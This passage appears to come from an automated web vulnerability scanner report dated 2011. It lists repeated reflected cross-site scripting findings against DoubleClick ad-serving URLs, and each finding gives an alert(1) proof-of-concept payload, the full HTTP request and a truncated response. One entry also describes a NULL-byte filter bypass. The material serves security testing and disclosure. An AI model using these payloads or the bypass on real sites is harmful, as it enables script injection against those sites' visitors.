Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4f97'-alert(1)-'3c450e58e7b was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554c4f97'-alert(1)-'3c450e58e7b&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3a9e/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554c4f97'-alert(1)-'3c450e58e7b&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\">
...[SNIP]...

4.116. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72347'-alert(1)-'4c8f0ab3a92 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=5439372347'-alert(1)-'4c8f0ab3a92&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:17 GMT
Expires: Sat, 29 Jan 2011 05:20:17 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=5439372347'-alert(1)-'4c8f0ab3a92&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\">
...[SNIP]...

4.117. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73b99"-alert(1)-"22b3257a069 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=5439373b99"-alert(1)-"22b3257a069&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:16 GMT
Expires: Sat, 29 Jan 2011 05:20:16 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=5439373b99"-alert(1)-"22b3257a069&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindo
...[SNIP]...

4.118. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3db2"-alert(1)-"c4dc2695016 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602e3db2"-alert(1)-"c4dc2695016&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:11 GMT
Expires: Sat, 29 Jan 2011 05:20:11 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602e3db2"-alert(1)-"c4dc2695016&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess =
...[SNIP]...

4.119. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f28b5'-alert(1)-'fba16b567ae was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602f28b5'-alert(1)-'fba16b567ae&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602f28b5'-alert(1)-'fba16b567ae&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\">
...[SNIP]...

4.120. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f182e'-alert(1)-'844d4f6d01f was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8f182e'-alert(1)-'844d4f6d01f&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:21 GMT
Expires: Sat, 29 Jan 2011 05:20:21 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
7005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8f182e'-alert(1)-'844d4f6d01f&forced_click=http%3a%2f%2fwww.dawnrecetas.com\">
...[SNIP]...

4.121. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B4898428.3

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65f12"-alert(1)-"83d92f4e7a4 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=865f12"-alert(1)-"83d92f4e7a4&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:21 GMT
Expires: Sat, 29 Jan 2011 05:20:21 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
7005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=865f12"-alert(1)-"83d92f4e7a4&forced_click=http%3a%2f%2fwww.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "fals
...[SNIP]...

4.122. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B5189085.13

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %004bbf5"-alert(1)-"260e69958b was submitted in the c parameter. This input was echoed as 4bbf5"-alert(1)-"260e69958b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0%004bbf5"-alert(1)-"260e69958b&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6231
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:22 GMT
Expires: Sat, 29 Jan 2011 05:20:22 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0%004bbf5"-alert(1)-"260e69958b&tp=8&forced_click=http://instoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptac
...[SNIP]...

4.123. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B5189085.13

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 364be'-alert(1)-'2ba227b9740 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0364be'-alert(1)-'2ba227b9740&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 496
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:23 GMT
Expires: Sat, 29 Jan 2011 05:20:23 GMT
Connection: close

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/c/7e/%2a/q;235157859;1-0;0;59025920;4307-300/250;40327153/40344940/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0364be'-alert(1)-'2ba227b9740&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx">
...[SNIP]...

4.124. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B5189085.13

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef88f'-alert(1)-'362fa6d4daf was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=8&forced_click=ef88f'-alert(1)-'362fa6d4daf HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6223
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:26 GMT
Expires: Sat, 29 Jan 2011 05:20:26 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=8&forced_click=ef88f'-alert(1)-'362fa6d4dafhttp://instoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\">
...[SNIP]...

4.125. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B5189085.13

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a0b1"-alert(1)-"82733519075 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6a0b1"-alert(1)-"82733519075&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6237
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:17 GMT
Expires: Sat, 29 Jan 2011 05:20:17 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
e/f/7d/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6a0b1"-alert(1)-"82733519075&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
...[SNIP]...

4.126. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B5189085.13

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb052'-alert(1)-'fcd59c06eba was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6fb052'-alert(1)-'fcd59c06eba&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6241
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:18 GMT
Expires: Sat, 29 Jan 2011 05:20:18 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/f/7e/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6fb052'-alert(1)-'fcd59c06eba&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\">
...[SNIP]...

4.127. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B5189085.13

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa157"-alert(1)-"44321d95d77 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438aa157"-alert(1)-"44321d95d77&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6241
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:15 GMT
Expires: Sat, 29 Jan 2011 05:20:15 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3a9e/f/7e/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438aa157"-alert(1)-"44321d95d77&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

4.128. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B5189085.13

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cb80'-alert(1)-'81af67c145b was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=5194384cb80'-alert(1)-'81af67c145b&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6241
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:15 GMT
Expires: Sat, 29 Jan 2011 05:20:15 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3a9e/f/7e/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=5194384cb80'-alert(1)-'81af67c145b&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\">
...[SNIP]...

4.129. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B5189085.13

Issue detail

